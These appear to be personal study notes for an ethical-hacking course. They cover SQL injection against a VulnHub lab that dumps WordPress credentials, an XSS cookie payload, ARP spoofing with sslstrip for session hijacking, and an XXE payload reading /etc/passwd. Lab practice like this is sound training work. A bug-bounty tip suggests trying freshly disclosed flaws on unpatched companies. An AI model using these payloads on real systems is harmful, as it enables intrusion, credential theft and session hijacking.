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CEH Notes Day-16 (05/01/2020)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https://www.vulnhub.com/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Hackademic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url for beginning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enumerating the different pages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http://192.168.1.59/Hackademic_RTB1/?p=9#comments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http://192.168.1.59/Hackademic_RTB1/?cat=1 --&gt; looks potentially suspicious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http://192.168.1.59/Hackademic_RTB1/?cat=1'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http://192.168.1.59/Hackademic_RTB1/?cat=1 order by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http://192.168.1.59/Hackademic_RTB1/?cat=1 order by 5 columns == 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http://192.168.1.59/Hackademic_RTB1/?cat=1 UNION SELECT 1,2,3,4,5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http://192.168.1.59/Hackademic_RTB1/?cat=1 UNION SELECT 1,2,3,4,5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http://192.168.1.59/Hackademic_RTB1/?cat=0 UNION SELECT 1,database(),3,4,5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 name == wordpress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http://192.168.1.59/Hackademic_RTB1/?cat=0 UNION SELECT 1,group_concat(table_name),3,4,5 from information_schema.tables where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table_schema=database()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wp_categories,wp_comments,wp_linkcategories,wp_links,wp_options,wp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http://192.168.1.59/Hackademic_RTB1/?cat=0 UNION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1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=wp_users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wp_users == 0x77705f7573657273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http://192.168.1.59/Hackademic_RTB1/?cat=0 UNION SELECT 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x77705f7573657273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ID,user_login,user_pass,user_firstname,user_lastname,user_nickname,us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columns we want to dump == ID,user_login,user_pass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http://192.168.1.59/Hackademic_RTB1/?cat=0 UNION SELECT 1,group_concat(ID,0x3a,user_login,user_pass),3,4,5 from wp_users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DVWA XSS reflected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&lt;script&gt;alert(document.cookie);&lt;/script&gt;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 hijacking with arpspoof and sslstrip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locate sslstrip | grep README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 /usr/share/doc/sslstrip/README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a new terminal tab,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echo "1" &gt; /proc/sys/net/ipv4/ip_forward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iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000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sslstrip -a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a new terminal tab,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arpspoof -i eth0 -t &lt;target ip&gt; 192.168.1.1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a new terminal tab,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arpspoof -i eth0 -t 192.168.1.1 &lt;target ip&gt;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finally, run wireshark with filter expression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ip.addr == &lt;target ip&gt; &amp;&amp; http.cookie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the cookie value in hypertext transfer protocol line,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-&gt; as printable text,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paste in a temporary file so you can manipulate your session id to the obtained session id values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browser -&gt; dweb developer -&gt; storage inspector (shortcut shift f9)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modify your cookie values with the stolen values and make any request to impersonate the session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OWASP Top 10 - 2017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XXE - Using Burp suit interceptor, repeater, decoder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&lt;?xml version="1.0" ?&gt;&lt;!DOCTYPE thp [ &lt;!ELEMENT thp ANY&gt;&lt;!ENTITY book SYSTEM "file:///etc/passwd"&gt;]&gt;&lt;thp&gt;Hack The %26book%3B&lt;/thp&gt;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https://github.com/swisskyrepo/PayloadsAllTheThings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insecure deserialization ajin abraham opsecx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https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/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exploit db insecure deserialization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Deserialization vulnerability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https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf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Bug Bounty Methodology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Once a vulnerability over a technology is disclosed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Immediately try that over a company which might have that technology since admins would have not patched it that soon.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Then create PoC video and submit it to obtain bounty.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ploit-db.com/docs/english/44756-deserialization-vulnerability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ulnhub.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-exec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